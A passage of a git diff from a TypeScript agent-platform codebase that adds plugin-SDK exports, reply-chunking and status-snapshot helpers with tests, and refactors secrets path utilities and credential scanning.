runPluginCommandWithTimeout } from "./run-command.js"; -export { createLoggerBackedRuntime } from "./runtime.js"; -export { buildProbeChannelStatusSummary } from "./status-helpers.js"; +export { dispatchReplyFromConfigWithSettledDispatcher } from "./inbound-reply-dispatch.js"; +export { createLoggerBackedRuntime, resolveRuntimeEnv } from "./runtime.js"; +export { resolveInboundSessionEnvelopeContext } from "../channels/session-envelope.js"; +export { + buildProbeChannelStatusSummary, + collectStatusIssuesFromLastError, +} from "./status-helpers.js"; diff --git a/src/plugin-sdk/minimax-portal-auth.ts b/src/plugin-sdk/minimax-portal-auth.ts index 2f6ab59e124..9a8b0f0bb80 100644 --- a/src/plugin-sdk/minimax-portal-auth.ts +++ b/src/plugin-sdk/minimax-portal-auth.ts @@ -2,6 +2,7 @@ // Keep this list additive and scoped to symbols used under extensions/minimax-portal-auth. export { emptyPluginConfigSchema } from "../plugins/config-schema.js"; +export { buildOauthProviderAuthResult } from "./provider-auth-result.js"; export type { OpenClawPluginApi, ProviderAuthContext, diff --git a/src/plugin-sdk/msteams.ts b/src/plugin-sdk/msteams.ts index 28f5e10a4c0..ae3e7d3564e 100644 --- a/src/plugin-sdk/msteams.ts +++ b/src/plugin-sdk/msteams.ts @@ -94,9 +94,11 @@ export { loadWebMedia } from "../web/media.js"; export type { WizardPrompter } from "../wizard/prompts.js"; export { keepHttpServerTaskAlive } from "./channel-lifecycle.js"; export { withFileLock } from "./file-lock.js"; +export { dispatchReplyFromConfigWithSettledDispatcher } from "./inbound-reply-dispatch.js"; export { readJsonFileWithFallback, writeJsonFileAtomically } from "./json-store.js"; export { loadOutboundMediaFromUrl } from "./outbound-media.js"; export { createScopedPairingAccess } from "./pairing-access.js"; +export { resolveInboundSessionEnvelopeContext } from "../channels/session-envelope.js"; export { buildHostnameAllowlistPolicyFromSuffixAllowlist, isHttpsUrlAllowedByHostnameSuffixAllowlist, @@ -104,5 +106,7 @@ export { } from "./ssrf-policy.js"; export { buildBaseChannelStatusSummary, + buildProbeChannelStatusSummary, + buildRuntimeAccountStatusSnapshot, createDefaultChannelRuntimeState, } from "./status-helpers.js"; diff --git a/src/plugin-sdk/nextcloud-talk.ts b/src/plugin-sdk/nextcloud-talk.ts index 7d66c5e66be..14d633a4c85 100644 --- a/src/plugin-sdk/nextcloud-talk.ts +++ b/src/plugin-sdk/nextcloud-talk.ts @@ -12,6 +12,7 @@ export { } from "../channels/plugins/channel-config.js"; export { deleteAccountFromConfigSection, + clearAccountEntryFields, setAccountEnabledInConfigSection, } from "../channels/plugins/config-helpers.js"; export { buildChannelConfigSchema } from "../channels/plugins/config-schema.js"; @@ -89,4 +90,9 @@ export { formatTextWithAttachmentLinks, resolveOutboundMediaUrls, } from "./reply-payload.js"; +export { dispatchInboundReplyWithBase } from "./inbound-reply-dispatch.js"; export { createLoggerBackedRuntime } from "./runtime.js"; +export { + buildBaseChannelStatusSummary, + buildRuntimeAccountStatusSnapshot, +} from "./status-helpers.js"; diff --git a/src/plugin-sdk/qwen-portal-auth.ts b/src/plugin-sdk/qwen-portal-auth.ts index 33d03ae394b..1056b98d0cf 100644 --- a/src/plugin-sdk/qwen-portal-auth.ts +++ b/src/plugin-sdk/qwen-portal-auth.ts @@ -2,5 +2,6 @@ // Keep this list additive and scoped to symbols used under extensions/qwen-portal-auth. export { emptyPluginConfigSchema } from "../plugins/config-schema.js"; +export { buildOauthProviderAuthResult } from "./provider-auth-result.js"; export type { OpenClawPluginApi, ProviderAuthContext } from "../plugins/types.js"; export { generatePkceVerifierChallenge, toFormUrlEncoded } from "./oauth-utils.js"; diff --git a/src/plugin-sdk/reply-payload.test.ts b/src/plugin-sdk/reply-payload.test.ts new file mode 100644 index 00000000000..780b75686a1 --- /dev/null +++ b/src/plugin-sdk/reply-payload.test.ts @@ -0,0 +1,58 @@ +import { describe, expect, it } from "vitest"; +import { isNumericTargetId, sendPayloadWithChunkedTextAndMedia } from "./reply-payload.js"; + +describe("sendPayloadWithChunkedTextAndMedia", () => { + it("returns empty result when payload has no text and no media", async () => { + const result = await sendPayloadWithChunkedTextAndMedia({ + ctx: { payload: {} }, + sendText: async () => ({ channel: "test", messageId: "text" }), + sendMedia: async () => ({ channel: "test", messageId: "media" }), + emptyResult: { channel: "test", messageId: "" }, + }); + expect(result).toEqual({ channel: "test", messageId: "" }); + }); + + it("sends first media with text and remaining media without text", async () => { + const calls: Array<{ text: string; mediaUrl: string }> = []; + const result = await sendPayloadWithChunkedTextAndMedia({ + ctx: { + payload: { text: "hello", mediaUrls: ["https://a", "https://b"] }, + }, + sendText: async () => ({ channel: "test", messageId: "text" }), + sendMedia: async (ctx) => { + calls.push({ text: ctx.text, mediaUrl: ctx.mediaUrl }); + return { channel: "test", messageId: ctx.mediaUrl }; + }, + emptyResult: { channel: "test", messageId: "" }, + }); + expect(calls).toEqual([ + { text: "hello", mediaUrl: "https://a" }, + { text: "", mediaUrl: "https://b" }, + ]); + expect(result).toEqual({ channel: "test", messageId: "https://b" }); + }); + + it("chunks text and sends each chunk", async () => { + const chunks: string[] = []; + const result = await sendPayloadWithChunkedTextAndMedia({ + ctx: { payload: { text: "alpha beta gamma" } }, + textChunkLimit: 5, + chunker: () => ["alpha", "beta", "gamma"], + sendText: async (ctx) => { + chunks.push(ctx.text); + return { channel: "test", messageId: ctx.text }; + }, + sendMedia: async () => ({ channel: "test", messageId: "media" }), + emptyResult: { channel: "test", messageId: "" }, + }); + expect(chunks).toEqual(["alpha", "beta", "gamma"]); + expect(result).toEqual({ channel: "test", messageId: "gamma" }); + }); + + it("detects numeric target IDs", () => { + expect(isNumericTargetId("12345")).toBe(true); + expect(isNumericTargetId(" 987 ")).toBe(true); + expect(isNumericTargetId("ab12")).toBe(false); + expect(isNumericTargetId("")).toBe(false); + }); +}); diff --git a/src/plugin-sdk/reply-payload.ts b/src/plugin-sdk/reply-payload.ts index b2534cd629c..e141da2a940 100644 --- a/src/plugin-sdk/reply-payload.ts +++ b/src/plugin-sdk/reply-payload.ts @@ -49,6 +49,55 @@ export function resolveOutboundMediaUrls(payload: { return []; } +export async function sendPayloadWithChunkedTextAndMedia< + TContext extends { payload: object }, + TResult, +>(params: { + ctx: TContext; + textChunkLimit?: number; + chunker?: ((text: string, limit: number) => string[]) | null; + sendText: (ctx: TContext & { text: string }) => Promise; + sendMedia: (ctx: TContext & { text: string; mediaUrl: string }) => Promise; + emptyResult: TResult; +}): Promise { + const payload = params.ctx.payload as { text?: string; mediaUrls?: string[]; mediaUrl?: string }; + const text = payload.text ?? ""; + const urls = resolveOutboundMediaUrls(payload); + if (!text && urls.length === 0) { + return params.emptyResult; + } + if (urls.length > 0) { + let lastResult = await params.sendMedia({ + ...params.ctx, + text, + mediaUrl: urls[0], + }); + for (let i = 1; i < urls.length; i++) { + lastResult = await params.sendMedia({ + ...params.ctx, + text: "", + mediaUrl: urls[i], + }); + } + return lastResult; + } + const limit = params.textChunkLimit; + const chunks = limit && params.chunker ? params.chunker(text, limit) : [text]; + let lastResult: TResult; + for (const chunk of chunks) { + lastResult = await params.sendText({ ...params.ctx, text: chunk }); + } + return lastResult!; +} + +export function isNumericTargetId(raw: string): boolean { + const trimmed = raw.trim(); + if (!trimmed) { + return false; + } + return /^\d{3,}$/.test(trimmed); +} + export function formatTextWithAttachmentLinks( text: string | undefined, mediaUrls: string[], diff --git a/src/plugin-sdk/request-url.test.ts b/src/plugin-sdk/request-url.test.ts new file mode 100644 index 00000000000..94c0f1917e3 --- /dev/null +++ b/src/plugin-sdk/request-url.test.ts @@ -0,0 +1,17 @@ +import { describe, expect, it } from "vitest"; +import { resolveRequestUrl } from "./request-url.js"; + +describe("resolveRequestUrl", () => { + it("resolves string input", () => { + expect(resolveRequestUrl("https://example.com/a")).toBe("https://example.com/a"); + }); + + it("resolves URL input", () => { + expect(resolveRequestUrl(new URL("https://example.com/b"))).toBe("https://example.com/b"); + }); + + it("resolves object input with url field", () => { + const requestLike = { url: "https://example.com/c" } as unknown as RequestInfo; + expect(resolveRequestUrl(requestLike)).toBe("https://example.com/c"); + }); +}); diff --git a/src/plugin-sdk/request-url.ts b/src/plugin-sdk/request-url.ts new file mode 100644 index 00000000000..2ba7354cc28 --- /dev/null +++ b/src/plugin-sdk/request-url.ts @@ -0,0 +1,12 @@ +export function resolveRequestUrl(input: RequestInfo | URL): string { + if (typeof input === "string") { + return input; + } + if (input instanceof URL) { + return input.toString(); + } + if (typeof input === "object" && input && "url" in input && typeof input.url === "string") { + return input.url; + } + return ""; +} diff --git a/src/plugin-sdk/runtime.test.ts b/src/plugin-sdk/runtime.test.ts new file mode 100644 index 00000000000..0dedb79e8e1 --- /dev/null +++ b/src/plugin-sdk/runtime.test.ts @@ -0,0 +1,39 @@ +import { describe, expect, it, vi } from "vitest"; +import type { RuntimeEnv } from "../runtime.js"; +import { resolveRuntimeEnv } from "./runtime.js"; + +describe("resolveRuntimeEnv", () => { + it("returns provided runtime when present", () => { + const runtime: RuntimeEnv = { + log: vi.fn(), + error: vi.fn(), + exit: vi.fn(() => { + throw new Error("exit"); + }), + }; + const logger = { + info: vi.fn(), + error: vi.fn(), + }; + + const resolved = resolveRuntimeEnv({ runtime, logger }); + + expect(resolved).toBe(runtime); + expect(logger.info).not.toHaveBeenCalled(); + expect(logger.error).not.toHaveBeenCalled(); + }); + + it("creates logger-backed runtime when runtime is missing", () => { + const logger = { + info: vi.fn(), + error: vi.fn(), + }; + + const resolved = resolveRuntimeEnv({ logger }); + resolved.log?.("hello %s", "world"); + resolved.error?.("bad %d", 7); + + expect(logger.info).toHaveBeenCalledWith("hello world"); + expect(logger.error).toHaveBeenCalledWith("bad 7"); + }); +}); diff --git a/src/plugin-sdk/runtime.ts b/src/plugin-sdk/runtime.ts index dac01e9b5dc..c438a4e9788 100644 --- a/src/plugin-sdk/runtime.ts +++ b/src/plugin-sdk/runtime.ts @@ -22,3 +22,23 @@ export function createLoggerBackedRuntime(params: { }, }; } + +export function resolveRuntimeEnv(params: { + runtime?: RuntimeEnv; + logger: LoggerLike; + exitError?: (code: number) => Error; +}): RuntimeEnv { + return params.runtime ?? createLoggerBackedRuntime(params); +} + +export function resolveRuntimeEnvWithUnavailableExit(params: { + runtime?: RuntimeEnv; + logger: LoggerLike; + unavailableMessage?: string; +}): RuntimeEnv { + return resolveRuntimeEnv({ + runtime: params.runtime, + logger: params.logger, + exitError: () => new Error(params.unavailableMessage ?? "Runtime exit not available"), + }); +} diff --git a/src/plugin-sdk/status-helpers.test.ts b/src/plugin-sdk/status-helpers.test.ts index b2e10cc4ae8..b2b75bb1414 100644 --- a/src/plugin-sdk/status-helpers.test.ts +++ b/src/plugin-sdk/status-helpers.test.ts @@ -2,6 +2,8 @@ import { describe, expect, it } from "vitest"; import { buildBaseAccountStatusSnapshot, buildBaseChannelStatusSummary, + buildComputedAccountStatusSnapshot, + buildRuntimeAccountStatusSnapshot, buildTokenChannelStatusSummary, collectStatusIssuesFromLastError, createDefaultChannelRuntimeState, @@ -88,6 +90,42 @@ describe("buildBaseAccountStatusSnapshot", () => { }); }); +describe("buildComputedAccountStatusSnapshot", () => { + it("builds account status when configured is computed outside resolver", () => { + expect( + buildComputedAccountStatusSnapshot({ + accountId: "default", + enabled: true, + configured: false, + }), + ).toEqual({ + accountId: "default", + name: undefined, + enabled: true, + configured: false, + running: false, + lastStartAt: null, + lastStopAt: null, + lastError: null, + probe: undefined, + lastInboundAt: null, + lastOutboundAt: null, + }); + }); +}); + +describe("buildRuntimeAccountStatusSnapshot", () => { + it("builds runtime lifecycle fields with defaults", () => { + expect(buildRuntimeAccountStatusSnapshot({})).toEqual({ + running: false, + lastStartAt: null, + lastStopAt: null, + lastError: null, + probe: undefined, + }); + }); +}); + describe("buildTokenChannelStatusSummary", () => { it("includes token/probe fields with mode by default", () => { expect(buildTokenChannelStatusSummary({})).toEqual({ diff --git a/src/plugin-sdk/status-helpers.ts b/src/plugin-sdk/status-helpers.ts index c6abc1d6e54..42aad35a702 100644 --- a/src/plugin-sdk/status-helpers.ts +++ b/src/plugin-sdk/status-helpers.ts @@ -81,13 +81,44 @@ export function buildBaseAccountStatusSnapshot(params: { name: account.name, enabled: account.enabled, configured: account.configured, + ...buildRuntimeAccountStatusSnapshot({ runtime, probe }), + lastInboundAt: runtime?.lastInboundAt ?? null, + lastOutboundAt: runtime?.lastOutboundAt ?? null, + }; +} + +export function buildComputedAccountStatusSnapshot(params: { + accountId: string; + name?: string; + enabled?: boolean; + configured?: boolean; + runtime?: RuntimeLifecycleSnapshot | null; + probe?: unknown; +}) { + const { accountId, name, enabled, configured, runtime, probe } = params; + return buildBaseAccountStatusSnapshot({ + account: { + accountId, + name, + enabled, + configured, + }, + runtime, + probe, + }); +} + +export function buildRuntimeAccountStatusSnapshot(params: { + runtime?: RuntimeLifecycleSnapshot | null; + probe?: unknown; +}) { + const { runtime, probe } = params; + return { running: runtime?.running ?? false, lastStartAt: runtime?.lastStartAt ?? null, lastStopAt: runtime?.lastStopAt ?? null, lastError: runtime?.lastError ?? null, probe, - lastInboundAt: runtime?.lastInboundAt ?? null, - lastOutboundAt: runtime?.lastOutboundAt ?? null, }; } diff --git a/src/plugin-sdk/telegram.ts b/src/plugin-sdk/telegram.ts index c4dfce3e441..53167998404 100644 --- a/src/plugin-sdk/telegram.ts +++ b/src/plugin-sdk/telegram.ts @@ -22,6 +22,7 @@ export { export { buildChannelConfigSchema } from "../channels/plugins/config-schema.js"; export { deleteAccountFromConfigSection, + clearAccountEntryFields, setAccountEnabledInConfigSection, } from "../channels/plugins/config-helpers.js"; export { formatPairingApproveHint } from "../channels/plugins/helpers.js"; diff --git a/src/plugin-sdk/zalo.ts b/src/plugin-sdk/zalo.ts index 07237369d2e..440cffd0de9 100644 --- a/src/plugin-sdk/zalo.ts +++ b/src/plugin-sdk/zalo.ts @@ -66,9 +66,18 @@ export { evaluateSenderGroupAccess } from "./group-access.js"; export type { SenderGroupAccessDecision } from "./group-access.js"; export { resolveInboundRouteEnvelopeBuilderWithRuntime } from "./inbound-envelope.js"; export { createScopedPairingAccess } from "./pairing-access.js"; +export { buildChannelSendResult } from "./channel-send-result.js"; export type { OutboundReplyPayload } from "./reply-payload.js"; -export { resolveOutboundMediaUrls, sendMediaWithLeadingCaption } from "./reply-payload.js"; -export { buildTokenChannelStatusSummary } from "./status-helpers.js"; +export { + isNumericTargetId, + resolveOutboundMediaUrls, + sendMediaWithLeadingCaption, + sendPayloadWithChunkedTextAndMedia, +} from "./reply-payload.js"; +export { + buildBaseAccountStatusSnapshot, + buildTokenChannelStatusSummary, +} from "./status-helpers.js"; export { chunkTextForOutbound } from "./text-chunking.js"; export { extractToolSend } from "./tool-send.js"; export { diff --git a/src/plugin-sdk/zalouser.ts b/src/plugin-sdk/zalouser.ts index 3109802fbb3..d0c75742ef0 100644 --- a/src/plugin-sdk/zalouser.ts +++ b/src/plugin-sdk/zalouser.ts @@ -57,7 +57,14 @@ export { resolveSenderCommandAuthorization } from "./command-auth.js"; export { resolveChannelAccountConfigBasePath } from "./config-paths.js"; export { loadOutboundMediaFromUrl } from "./outbound-media.js"; export { createScopedPairingAccess } from "./pairing-access.js"; +export { buildChannelSendResult } from "./channel-send-result.js"; export type { OutboundReplyPayload } from "./reply-payload.js"; -export { resolveOutboundMediaUrls, sendMediaWithLeadingCaption } from "./reply-payload.js"; +export { + isNumericTargetId, + resolveOutboundMediaUrls, + sendMediaWithLeadingCaption, + sendPayloadWithChunkedTextAndMedia, +} from "./reply-payload.js"; export { formatResolvedUnresolvedNote } from "./resolution-notes.js"; +export { buildBaseAccountStatusSnapshot } from "./status-helpers.js"; export { chunkTextForOutbound } from "./text-chunking.js"; diff --git a/src/plugins/wired-hooks-after-tool-call.e2e.test.ts b/src/plugins/wired-hooks-after-tool-call.e2e.test.ts index ad04cd80f44..147ca323a91 100644 --- a/src/plugins/wired-hooks-after-tool-call.e2e.test.ts +++ b/src/plugins/wired-hooks-after-tool-call.e2e.test.ts @@ -1,7 +1,8 @@ +import { beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; /** * Test: after_tool_call hook wiring (pi-embedded-subscribe.handlers.tools.ts) */ -import { beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; +import { createBaseToolHandlerState } from "../agents/pi-tool-handler-state.test-helpers.js"; const hookMocks = vi.hoisted(() => ({ runner: { @@ -38,17 +39,7 @@ function createToolHandlerCtx(params: { }, state: { toolMetaById: new Map(), - toolMetas: [] as Array<{ toolName?: string; meta?: string }>, - toolSummaryById: new Set(), - lastToolError: undefined, - pendingMessagingTexts: new Map(), - pendingMessagingTargets: new Map(), - pendingMessagingMediaUrls: new Map(), - messagingToolSentTexts: [] as string[], - messagingToolSentTextsNormalized: [] as string[], - messagingToolSentMediaUrls: [] as string[], - messagingToolSentTargets: [] as unknown[], - blockBuffer: "", + ...createBaseToolHandlerState(), }, log: { debug: vi.fn(), warn: vi.fn() }, flushBlockReplyBuffer: vi.fn(), diff --git a/src/secrets/apply.ts b/src/secrets/apply.ts index 1286071cf91..85408954239 100644 --- a/src/secrets/apply.ts +++ b/src/secrets/apply.ts @@ -298,7 +298,8 @@ function applyConfigTargetMutations(params: { } const targetPathSegments = resolved.pathSegments; - if (resolved.entry.secretShape === "sibling_ref") { + const usesSiblingRef = resolved.entry.secretShape === "sibling_ref"; // pragma: allowlist secret + if (usesSiblingRef) { const previous = getPath(params.nextConfig, targetPathSegments); if (isNonEmptyString(previous)) { scrubbedValues.add(previous.trim()); @@ -530,7 +531,8 @@ function applyAuthProfileTargetMutation(params: { store, }); const targetPathSegments = params.resolved.pathSegments; - if (params.resolved.entry.secretShape === "sibling_ref") { + const usesSiblingRef = params.resolved.entry.secretShape === "sibling_ref"; // pragma: allowlist secret + if (usesSiblingRef) { const previous = getPath(store, targetPathSegments); if (isNonEmptyString(previous)) { params.scrubbedValues.add(previous.trim()); diff --git a/src/secrets/audit.test.ts b/src/secrets/audit.test.ts index 21f59d51cac..cd85d84d3d8 100644 --- a/src/secrets/audit.test.ts +++ b/src/secrets/audit.test.ts @@ -53,7 +53,7 @@ async function createAuditFixture(): Promise { env: { OPENCLAW_STATE_DIR: stateDir, OPENCLAW_CONFIG_PATH: configPath, - OPENAI_API_KEY: "env-openai-key", + OPENAI_API_KEY: "env-openai-key", // pragma: allowlist secret PATH: resolveRuntimePathEnv(), }, }; @@ -146,7 +146,7 @@ describe("secrets audit", () => { "#!/bin/sh", `printf 'x\\n' >> ${JSON.stringify(execLogPath)}`, "cat >/dev/null", - 'printf \'{"protocolVersion":1,"values":{"providers/openai/apiKey":"value:providers/openai/apiKey","providers/moonshot/apiKey":"value:providers/moonshot/apiKey"}}\'', + 'printf \'{"protocolVersion":1,"values":{"providers/openai/apiKey":"value:providers/openai/apiKey","providers/moonshot/apiKey":"value:providers/moonshot/apiKey"}}\'', // pragma: allowlist secret ].join("\n"), { encoding: "utf8", mode: 0o700 }, ); diff --git a/src/secrets/audit.ts b/src/secrets/audit.ts index 277983d1deb..132ea4ac431 100644 --- a/src/secrets/audit.ts +++ b/src/secrets/audit.ts @@ -36,7 +36,7 @@ export type SecretsAuditCode = | "REF_SHADOWED" | "LEGACY_RESIDUE"; -export type SecretsAuditSeverity = "info" | "warn" | "error"; +export type SecretsAuditSeverity = "info" | "warn" | "error"; // pragma: allowlist secret export type SecretsAuditFinding = { code: SecretsAuditCode; @@ -48,7 +48,7 @@ export type SecretsAuditFinding = { profileId?: string; }; -export type SecretsAuditStatus = "clean" | "findings" | "unresolved"; +export type SecretsAuditStatus = "clean" | "findings" | "unresolved"; // pragma: allowlist secret export type SecretsAuditReport = { version: 1; diff --git a/src/secrets/auth-profiles-scan.ts b/src/secrets/auth-profiles-scan.ts index 77363c32377..d126b8dade8 100644 --- a/src/secrets/auth-profiles-scan.ts +++ b/src/secrets/auth-profiles-scan.ts @@ -73,6 +73,25 @@ export function getAuthProfileFieldSpec(type: AuthProfileCredentialType): AuthPr return AUTH_PROFILE_FIELD_SPEC_BY_TYPE[type]; } +function toSecretCredentialVisit(params: { + kind: AuthProfileCredentialType; + profileId: string; + provider: string; + profile: Record; +}): ApiKeyCredentialVisit | TokenCredentialVisit { + const spec = getAuthProfileFieldSpec(params.kind); + return { + kind: params.kind, + profileId: params.profileId, + provider: params.provider, + profile: params.profile, + valueField: spec.valueField, + refField: spec.refField, + value: params.profile[spec.valueField], + refValue: params.profile[spec.refField], + }; +} + export function* iterateAuthProfileCredentials( profiles: Record, ): Iterable { @@ -81,32 +100,13 @@ export function* iterateAuthProfileCredentials( continue; } const provider = String(value.provider); - if (value.type === "api_key") { - const spec = getAuthProfileFieldSpec("api_key"); - yield { - kind: "api_key", + if (value.type === "api_key" || value.type === "token") { + yield toSecretCredentialVisit({ + kind: value.type, profileId, provider, profile: value, - valueField: spec.valueField, - refField: spec.refField, - value: value[spec.valueField], - refValue: value[spec.refField], - }; - continue; - } - if (value.type === "token") { - const spec = getAuthProfileFieldSpec("token"); - yield { - kind: "token", - profileId, - provider, - profile: value, - valueField: spec.valueField, - refField: spec.refField, - value: value[spec.valueField], - refValue: value[spec.refField], - }; + }); continue; } if (value.type === "oauth") { diff --git a/src/secrets/auth-store-paths.ts b/src/secrets/auth-store-paths.ts index 12fe01dda4d..d2814850d23 100644 --- a/src/secrets/auth-store-paths.ts +++ b/src/secrets/auth-store-paths.ts @@ -5,10 +5,10 @@ import { resolveAuthStorePath } from "../agents/auth-profiles/paths.js"; import type { OpenClawConfig } from "../config/config.js"; import { resolveUserPath } from "../utils.js"; -export function collectAuthStorePaths(config: OpenClawConfig, stateDir: string): string[] { +export function listAuthProfileStorePaths(config: OpenClawConfig, stateDir: string): string[] { const paths = new Set(); // Scope default auth store discovery to the provided stateDir instead of - // ambient process env, so callers do not touch unrelated host-global stores. + // ambient process env, so scans do not include unrelated host-global stores. paths.add(path.join(resolveUserPath(stateDir), "agents", "main", "agent", "auth-profiles.json")); const agentsRoot = path.join(resolveUserPath(stateDir), "agents"); @@ -34,3 +34,7 @@ export function collectAuthStorePaths(config: OpenClawConfig, stateDir: string): return [...paths]; } + +export function collectAuthStorePaths(config: OpenClawConfig, stateDir: string): string[] { + return listAuthProfileStorePaths(config, stateDir); +} diff --git a/src/secrets/command-config.ts b/src/secrets/command-config.ts index dc542eba00b..0d264aad9e7 100644 --- a/src/secrets/command-config.ts +++ b/src/secrets/command-config.ts @@ -79,7 +79,9 @@ export function analyzeCommandSecretAssignmentsFromSnapshot(params: { value: resolved, }); - if (target.entry.secretShape === "sibling_ref" && explicitRef && inlineCandidateRef) { + const hasCompetingSiblingRef = + target.entry.secretShape === "sibling_ref" && explicitRef && inlineCandidateRef; // pragma: allowlist secret + if (hasCompetingSiblingRef) { diagnostics.push( `${target.path}: both inline and sibling ref were present; sibling ref took precedence.`, ); diff --git a/src/secrets/credential-matrix.ts b/src/secrets/credential-matrix.ts index a3c44e34fdb..05fa45f749e 100644 --- a/src/secrets/credential-matrix.ts +++ b/src/secrets/credential-matrix.ts @@ -6,7 +6,7 @@ type CredentialMatrixEntry = { path: string; refPath?: string; when?: { type: "api_key" | "token" }; - secretShape: "secret_input" | "sibling_ref"; + secretShape: "secret_input" | "sibling_ref"; // pragma: allowlist secret optIn: true; notes?: string; }; diff --git a/src/secrets/path-utils.test.ts b/src/secrets/path-utils.test.ts index c8c69ceba83..4b13bcc299b 100644 --- a/src/secrets/path-utils.test.ts +++ b/src/secrets/path-utils.test.ts @@ -11,6 +11,14 @@ function asConfig(value: unknown): OpenClawConfig { return value as OpenClawConfig; } +function createAgentListConfig(): OpenClawConfig { + return asConfig({ + agents: { + list: [{ id: "a" }], + }, + }); +} + describe("secrets path utils", () => { it("deletePathStrict compacts arrays via splice", () => { const config = asConfig({}); @@ -30,11 +38,7 @@ describe("secrets path utils", () => { }); it("setPathExistingStrict throws when path does not already exist", () => { - const config = asConfig({ - agents: { - list: [{ id: "a" }], - }, - }); + const config = createAgentListConfig(); expect(() => setPathExistingStrict( config, @@ -72,19 +76,4 @@ describe("secrets path utils", () => { expect(changed).toBe(false); expect(getPath(config, ["talk", "apiKey"])).toBe("same"); }); - - it("setPathExistingStrict fails when intermediate segment is missing", () => { - const config = asConfig({ - agents: { - list: [{ id: "a" }], - }, - }); - expect(() => - setPathExistingStrict( - config, - ["agents", "list", "0", "memorySearch", "remote", "apiKey"], - "x", - ), - ).toThrow(/Path segment does not exist/); - }); }); diff --git a/src/secrets/path-utils.ts b/src/secrets/path-utils.ts index d88fc0487e5..b04066560c8 100644 --- a/src/secrets/path-utils.ts +++ b/src/secrets/path-utils.ts @@ -10,6 +10,63 @@ function expectedContainer(nextSegment: string): "array" | "object" { return isArrayIndexSegment(nextSegment) ? "array" : "object"; } +function parseArrayLeafTarget( + cursor: unknown, + leaf: string, + segments: string[], +): { array: unknown[]; index: number } | null { + if (!Array.isArray(cursor)) { + return null; + } + if (!isArrayIndexSegment(leaf)) { + throw new Error(`Invalid array index segment "${leaf}" at ${segments.join(".")}.`); + } + return { array: cursor, index: Number.parseInt(leaf, 10) }; +} + +function traverseToLeafParent(params: { + root: unknown; + segments: string[]; + requireExistingSegment: boolean; +}): unknown { + if (params.segments.length === 0) { + throw new Error("Target path is empty."); + } + + let cursor: unknown = params.root; + for (let index = 0; index < params.segments.length - 1; index += 1) { + const segment = params.segments[index] ?? ""; + if (Array.isArray(cursor)) { + if (!isArrayIndexSegment(segment)) { + throw new Error( + `Invalid array index segment "${segment}" at ${params.segments.join(".")}.`, + ); + } + const arrayIndex = Number.parseInt(segment, 10); + if (params.requireExistingSegment && (arrayIndex < 0 || arrayIndex >= cursor.length)) { + throw new Error( + `Path segment does not exist at ${params.segments.slice(0, index + 1).join(".")}.`, + ); + } + cursor = cursor[arrayIndex]; + continue; + } + + if (!isRecord(cursor)) { + throw new Error( + `Invalid path shape at ${params.segments.slice(0, index).join(".") || ""}.`, + ); + } + if (params.requireExistingSegment && !Object.prototype.hasOwnProperty.call(cursor, segment)) { + throw new Error( + `Path segment does not exist at ${params.segments.slice(0, index + 1).join(".")}.`, + ); + } + cursor = cursor[segment]; + } + return cursor; +} + export function getPath(root: unknown, segments: string[]): unknown { if (segments.length === 0) { return undefined; @@ -77,13 +134,10 @@ export function setPathCreateStrict( } const leaf = segments[segments.length - 1] ?? ""; - if (Array.isArray(cursor)) { - if (!isArrayIndexSegment(leaf)) { - throw new Error(`Invalid array index segment "${leaf}" at ${segments.join(".")}.`); - } - const arrayIndex = Number.parseInt(leaf, 10); - if (!isDeepStrictEqual(cursor[arrayIndex], value)) { - cursor[arrayIndex] = value; + const arrayTarget = parseArrayLeafTarget(cursor, leaf, segments); + if (arrayTarget) { + if (!isDeepStrictEqual(arrayTarget.array[arrayTarget.index], value)) { + arrayTarget.array[arrayTarget.index] = value; changed = true; } return changed; @@ -103,46 +157,16 @@ export function setPathExistingStrict( segments: string[], value: unknown, ): boolean { - if (segments.length === 0) { - throw new Error("Target path is empty."); - } - let cursor: unknown = root; - - for (let index = 0; index < segments.length - 1; index += 1) { - const segment = segments[index] ?? ""; - if (Array.isArray(cursor)) { - if (!isArrayIndexSegment(segment)) { - throw new Error(`Invalid array index segment "${segment}" at ${segments.join(".")}.`); - } - const arrayIndex = Number.parseInt(segment, 10); - if (arrayIndex < 0 || arrayIndex >= cursor.length) { - throw new Error( - `Path segment does not exist at ${segments.slice(0, index + 1).join(".")}.`, - ); - } - cursor = cursor[arrayIndex]; - continue; - } - if (!isRecord(cursor)) { - throw new Error(`Invalid path shape at ${segments.slice(0, index).join(".") || ""}.`); - } - if (!Object.prototype.hasOwnProperty.call(cursor, segment)) { - throw new Error(`Path segment does not exist at ${segments.slice(0, index + 1).join(".")}.`); - } - cursor = cursor[segment]; - } + const cursor = traverseToLeafParent({ root, segments, requireExistingSegment: true }); const leaf = segments[segments.length - 1] ?? ""; - if (Array.isArray(cursor)) { - if (!isArrayIndexSegment(leaf)) { - throw new Error(`Invalid array index segment "${leaf}" at ${segments.join(".")}.`); - } - const arrayIndex = Number.parseInt(leaf, 10); - if (arrayIndex < 0 || arrayIndex >= cursor.length) { + const arrayTarget = parseArrayLeafTarget(cursor, leaf, segments); + if (arrayTarget) { + if (arrayTarget.index < 0 || arrayTarget.index >= arrayTarget.array.length) { throw new Error(`Path segment does not exist at ${segments.join(".")}.`); } - if (!isDeepStrictEqual(cursor[arrayIndex], value)) { - cursor[arrayIndex] = value; + if (!isDeepStrictEqual(arrayTarget.array[arrayTarget.index], value)) { + arrayTarget.array[arrayTarget.index] = value; return true; } return false; @@ -161,36 +185,16 @@ export function setPathExistingStrict( } export function deletePathStrict(root: OpenClawConfig, segments: string[]): boolean { - if (segments.length === 0) { - throw new Error("Target path is empty."); - } - let cursor: unknown = root; - for (let index = 0; index < segments.length - 1; index += 1) { - const segment = segments[index] ?? ""; - if (Array.isArray(cursor)) { - if (!isArrayIndexSegment(segment)) { - throw new Error(`Invalid array index segment "${segment}" at ${segments.join(".")}.`); - } - cursor = cursor[Number.parseInt(segment, 10)]; - continue; - } - if (!isRecord(cursor)) { - throw new Error(`Invalid path shape at ${segments.slice(0, index).join(".") || ""}.`); - } - cursor = cursor[segment]; - } + const cursor = traverseToLeafParent({ root, segments, requireExistingSegment: false }); const leaf = segments[segments.length - 1] ?? ""; - if (Array.isArray(cursor)) { - if (!isArrayIndexSegment(leaf)) { - throw new Error(`Invalid array index segment "${leaf}" at ${segments.join(".")}.`); - } - const arrayIndex = Number.parseInt(leaf, 10); - if (arrayIndex < 0 || arrayIndex >= cursor.length) { + const arrayTarget = parseArrayLeafTarget(cursor, leaf, segments); + if (arrayTarget) { + if (arrayTarget.index < 0 || arrayTarget.index >= arrayTarget.array.length) { return false; } 